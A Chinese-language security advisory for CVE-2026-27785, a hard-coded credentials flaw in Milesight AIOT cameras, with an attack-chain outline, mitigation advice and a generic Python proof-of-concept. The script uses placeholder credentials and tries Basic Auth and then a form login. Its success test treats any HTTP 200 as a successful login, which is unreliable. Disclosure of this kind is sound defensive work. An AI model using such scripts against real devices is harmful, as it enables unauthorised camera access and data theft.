CVE-2026-27785 CVSS 8.8 高危

CVE-2026-27785: Milesight AIOT摄像头硬编码凭据漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27785

漏洞类型

硬编码凭据

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Milesight AIOT Camera

漏洞概述

Milesight AIOT摄像头特定版本固件中存在硬编码凭据漏洞。由于固件中内置了固定的账号密码，攻击者无需认证即可利用该凭据获取设备的高权限访问。该漏洞可能导致设备被完全控制，造成敏感数据泄露、系统配置被篡改及服务中断，严重影响物联网设备的机密性、完整性和可用性。

技术细节

该漏洞的根本原因在于固件开发过程中将管理员或服务账号的凭据（如用户名和密码）以明文或弱加密形式硬编码在二进制文件或配置脚本中。攻击者通过网络嗅探、固件逆向分析或直接连接设备（攻击向量为邻接网络）等方式获取这些凭据。一旦获得凭据，攻击者可绕过正常的身份验证机制，直接登录设备后台。由于CVSS向量显示攻击复杂度低且无需用户交互，这使得针对该设备的自动化攻击极易实施。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络环境，识别目标Milesight AIOT摄像头设备。

STEP 2

2. 固件分析/凭据获取

攻击者通过公开的漏洞报告或逆向工程固件获取硬编码在系统中的管理员用户名和密码。

STEP 3

3. 身份验证绕过

攻击者使用获取到的硬编码凭据直接向设备的Web界面或API接口发起登录请求。

STEP 4

4. 执行攻击

成功登录后，攻击者获得管理员权限，可窃取视频流、修改系统配置或植入恶意软件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Title: Milesight AIOT Camera Hard-coded Credentials PoC
# Description: This script demonstrates how to authenticate using hard-coded credentials if known.

import requests

target_url = "http://<TARGET_IP>"
hardcoded_user = "admin"  # Replace with actual hardcoded username if known
hardcoded_pass = "hardcoded_secret"  # Replace with actual hardcoded password if known

def exploit():
    print(f"[+] Attempting to login to {target_url} using hard-coded credentials...")
    
    # Example using basic auth or form based login
    session = requests.Session()
    
    # Attempt 1: HTTP Basic Auth
    response = session.get(target_url, auth=(hardcoded_user, hardcoded_pass), timeout=5)
    
    if response.status_code == 200:
        print("[+] Success! Logged in via Basic Auth.")
        print(f"[+] Response: {response.text[:100]}...")
    else:
        # Attempt 2: Form Login (common in cameras)
        login_payload = {
            "username": hardcoded_user,
            "password": hardcoded_pass
        }
        login_url = f"{target_url}/login"
        resp = session.post(login_url, data=login_payload, timeout=5)
        if "dashboard" in resp.text.lower() or resp.status_code == 200:
             print("[+] Success! Logged in via Form Login.")
        else:
            print("[-] Failed to login. Credentials might be incorrect or logic differs.")

if __name__ == "__main__":
    exploit()

影响范围

Milesight AIOT Camera Firmware (Specific versions)

防御指南

临时缓解措施

建议立即联系厂商或访问官方网站，下载并安装修复了硬编码凭据问题的最新固件版本。在升级完成前，应将设备部署在受信任的网络环境中，关闭不必要的远程访问端口，并严格限制对设备的物理访问，以防被邻接网络中的攻击者利用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表